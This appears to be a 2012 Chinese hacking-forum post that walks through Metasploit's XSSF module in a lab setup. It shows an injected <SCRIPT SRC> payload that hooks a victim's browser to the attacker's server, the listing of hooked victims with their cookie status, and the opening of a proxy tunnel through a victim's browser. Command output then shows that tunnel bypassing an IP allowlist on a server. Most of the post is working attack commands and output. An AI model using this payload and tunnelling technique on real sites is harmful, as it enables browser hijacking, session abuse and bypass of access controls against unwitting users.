切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
251 Xssf :隧道[复制链接]
发表于 2012-9-11 23:18:19 | 显示全部楼层 |!read_mode!
RE:http://fuzzexp.org/tech/viewthread.php?tid=180
UB1:5.5.5.3 本机
WIN1:5.5.5.5 受害人
SERVER:5.5.5.4 服务器
UB1


  1. msf > xssf_urls
  2. [+] XSSF Server          : 'http://10.0.3.15:8888/'                 or 'http://:8888/'
  3. [+] Generic XSS injection: 'http://10.0.3.15:8888/loop'         or 'http://:8888/loop'
  4. [+] XSSF test page         : 'http://10.0.3.15:8888/test.html' or 'http://:8888/test.html'

  5. [+] XSSF Tunnel Proxy        : 'localhost:8889'
  6. [+] XSSF logs page        : 'http://localhost:8889/gui.html?guipage=main'
  7. [+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
  8. [+] XSSF help page        : 'http://localhost:8889/gui.html?guipage=help'
  9. msf >
复制代码

丢失 .. =等待下

js evil = http://5.5.5.3:8888/loop 替换下IP 我双网卡

WIN1 访问:http://fuzzexp.org/?s=%3CSCRIPT%20SRC=http://5.5.5.3:8888/loop%3E%3C/SCRIPT%3E


RE:http://fuzzexp.org/u/0day/?p=14


  1. 我用的是  <SCRIPT SRC=http://5.5.5.3:8888/loop></SCRIPT>
复制代码
获得会话

  1. msf > xssf_victims

  2. Victims
  3. =======

  4. id  xssf_server_id  active  ip       interval  browser_name       browser_version  cookie
  5. --  --------------  ------  --       --------  ------------       ---------------  ------
  6. 7   1                       5.5.5.5  10        Internet Explorer  6.0              NO
  7. 8   1               true    5.5.5.5  10        Firefox            13.0.1           YES
复制代码
开启代理模块 8是 Victims的ID

  1. msf > xssf_tunnel 8
  2. [*] Creating new tunnel with victim '8' (http://fuzzexp.org:80) ...
  3. [*] You can now add XSSF as your browser proxy (command 'xssf_url' to get proxy infos) and visit domain of victim '8' ! ;-)

  4. [*] NOTE: Other HTTP domains are also accessible through XSSF Tunnel, but user session won't be available
复制代码
设置UB1的浏览器代理:127.0.0.1 8889使用对方的流量


例如:SERVER :
  1. root@ubuntu:/var/www# cat ip.php
  2. <?php
  3. $ip=$_SERVER['REMOTE_ADDR'];
  4. $ok=0;
  5. foreach (preg_split('/\s+/',file_get_contents('aip.txt')) as $aip)
  6. if ($ip==$aip) $ok=1;
  7. if ($ok==0){
  8. echo 'no';
  9. exit;
  10. }
  11. ?>
  12. root@ubuntu:/var/www# cat aip.txt
  13. 5.5.5.5
  14. root@ubuntu:/var/www#
复制代码
只准5.5.5.5访问 也就是WIN ,当IP=5.5.5.5显示空白
当IP不等于5.5.5.5显示noUBUNTU1:
  1. root@Dis9Team:~# wget 5.5.5.4/ip.php
  2. --2012-08-21 05:18:56--  http://5.5.5.4/ip.php
  3. Connecting to 5.5.5.4:80... connected.
  4. HTTP request sent, awaiting response... 200 OK
  5. Length: 2 [text/html]
  6. Saving to: `ip.php'

  7. 100%[==================================================================================>] 2           --.-K/s   in 0s      

  8. 2012-08-21 05:18:56 (30.1 KB/s) - `ip.php' saved [2/2]

  9. root@Dis9Team:~# cat ip.php
  10. no
  11. root@Dis9Team:~#
复制代码
显示no
设置代理
  1. root@Dis9Team:~# wget -e http_proxy="127.0.0.1:8889" http://5.5.5.4/ip.php -O 1.txt
  2. --2012-08-21 05:21:55--  http://5.5.5.4/ip.php
  3. Connecting to 127.0.0.1:8889... connected.
  4. Proxy request sent, awaiting response... 200 OK
  5. Syntax error in Set-Cookie:  at position 0.
  6. Length: 2 [text/html]
  7. Saving to: `1.txt'

  8. 100%[==================================================================================>] 2           --.-K/s   in 0s      

  9. Last-modified header invalid -- time-stamp ignored.
  10. 2012-08-21 05:21:55 (211 KB/s) - `1.txt' saved [2/2]

  11. root@Dis9Team:~# cat 1.txt
  12. noroot@Dis9Team:~#
复制代码
显示空白 说明IP=5.5.5.5



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-2 13:52

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部